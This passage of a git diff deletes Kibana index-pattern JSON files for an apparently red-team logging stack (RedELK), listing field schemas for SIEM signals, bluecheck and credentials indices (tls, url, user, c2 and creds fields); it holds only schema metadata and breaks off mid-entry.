"esTypes": [ - "keyword" - ], - "name": "source.user.group.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.user.group.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.user.hash", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.user.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "source.user.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "source.user.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "source.user.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tags", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.framework", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.tactic.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.tactic.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.tactic.reference", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.technique.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.technique.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "threat.technique.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "threat.technique.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "threat.technique.reference", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.cipher", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.client.certificate", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.client.certificate_chain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.client.hash.md5", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.client.hash.sha1", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.client.hash.sha256", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.client.issuer", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.client.ja3", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "tls.client.not_after", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "tls.client.not_before", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.client.server_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.client.subject", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.client.supported_ciphers", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.curve", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "tls.established", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.next_protocol", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "boolean" - ], - "name": "tls.resumed", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "boolean" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.server.certificate", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.server.certificate_chain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.server.hash.md5", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.server.hash.sha1", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.server.hash.sha256", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.server.issuer", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.server.ja3s", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "tls.server.not_after", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "tls.server.not_before", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.server.subject", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "tls.version_protocol", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "trace.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "transaction.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.extension", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.fragment", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.full", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "url.full.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "url.full" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.original", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "url.original.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "url.original" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.password", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.path", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "long" - ], - "name": "url.port", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.query", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.registered_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.scheme", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.top_level_domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "url.username", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.email", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.full_name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "user.full_name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "user.full_name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.group.domain", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.group.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.group.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.hash", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "user.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "user.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user_agent.device.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user_agent.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user_agent.original", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "user_agent.original.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "user_agent.original" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user_agent.os.family", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user_agent.os.full", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "user_agent.os.full.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "user_agent.os.full" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user_agent.os.kernel", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user_agent.os.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "user_agent.os.name.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "user_agent.os.name" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user_agent.os.platform", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user_agent.os.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "user_agent.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vlan.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vlan.name", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vulnerability.category", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vulnerability.classification", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vulnerability.description", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "vulnerability.description.text", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "vulnerability.description" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vulnerability.enumeration", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vulnerability.id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vulnerability.reference", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vulnerability.report_id", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vulnerability.scanner.vendor", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "vulnerability.score.base", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "vulnerability.score.environmental", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "float" - ], - "name": "vulnerability.score.temporal", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "number" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vulnerability.score.version", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "vulnerability.severity", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "string" - } - ], - "timeFieldName": "@timestamp", - "title": ".siem-signals-*" - }, - "coreMigrationVersion": "7.16.3", - "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", - "migrationVersion": { - "index-pattern": "7.11.0" - }, - "references": [], - "sort": [ - 1642171872765, - 241 - ], - "type": "index-pattern", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_bluecheck.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_bluecheck.json deleted file mode 100644 index 4719cde1..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_bluecheck.json +++ /dev/null @@ -1,24 +0,0 @@ -[ - { - "attributes": { - "fieldAttrs": "{\"bluecheck.sectools.Product\":{\"count\":1},\"bluechecktype\":{\"count\":1}}", - "fields": [], - "runtimeFieldMap": "{}", - "timeFieldName": "@timestamp", - "title": "bluecheck-*", - "typeMeta": "{}" - }, - "coreMigrationVersion": "7.16.3", - "id": "972368b0-7b90-11ec-9471-7f985bde469d", - "migrationVersion": { - "index-pattern": "7.11.0" - }, - "references": [], - "sort": [ - 1644504089054, - 308 - ], - "type": "index-pattern", - "version": "1" - } -] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_credentials.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_credentials.json deleted file mode 100644 index 31b65195..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_credentials.json +++ /dev/null @@ -1,886 +0,0 @@ -[ - { - "attributes": { - "fields": [ - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "date" - ], - "name": "@timestamp", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "type": "date" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "@version", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "@version.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "@version" - } - }, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_id" - ], - "name": "_id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_index" - ], - "name": "_index", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "name": "_score", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "number" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "_source" - ], - "name": "_source", - "readFromDocValues": false, - "scripted": false, - "searchable": false, - "type": "_source" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "_type" - ], - "name": "_type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "agent.ephemeral_id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.ephemeral_id.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "agent.ephemeral_id" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "agent.hostname", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.hostname.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "agent.hostname" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "agent.id", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.id.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "agent.id" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "agent.name", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.name.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "agent.name" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "agent.type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.type.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "agent.type" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "agent.version", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "agent.version.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "agent.version" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "c2.log.type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "c2.log.type.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "c2.log.type" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "c2.program", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "c2.program.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "c2.program" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "creds.credential", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "creds.credential.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "creds.credential" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "creds.host", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "creds.host.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "creds.host" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "creds.realm", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "creds.realm.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "creds.realm" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "creds.source", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "creds.source.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "creds.source" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "creds.username", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "creds.username.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "creds.username" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "ecs.version", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "ecs.version.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "ecs.version" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "event.action", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.action.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "event.action" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "event.category", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.category.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "event.category" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "event.dataset", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.dataset.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "event.dataset" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "event.kind", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.kind.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "event.kind" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "event.module", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.module.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "event.module" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "event.type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "event.type.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "event.type" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "infra.attack_scenario", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - "count": 0, - "esTypes": [ - "keyword" - ], - "name": "infra.attack_scenario.keyword", - "readFromDocValues": true, - "scripted": false, - "searchable": true, - "subType": { - "multi": { - "parent": "infra.attack_scenario" - } - }, - "type": "string" - }, - { - "aggregatable": false, - "count": 0, - "esTypes": [ - "text" - ], - "name": "infra.log.type", - "readFromDocValues": false, - "scripted": false, - "searchable": true, - "type": "string" - }, - { - "aggregatable": true, - 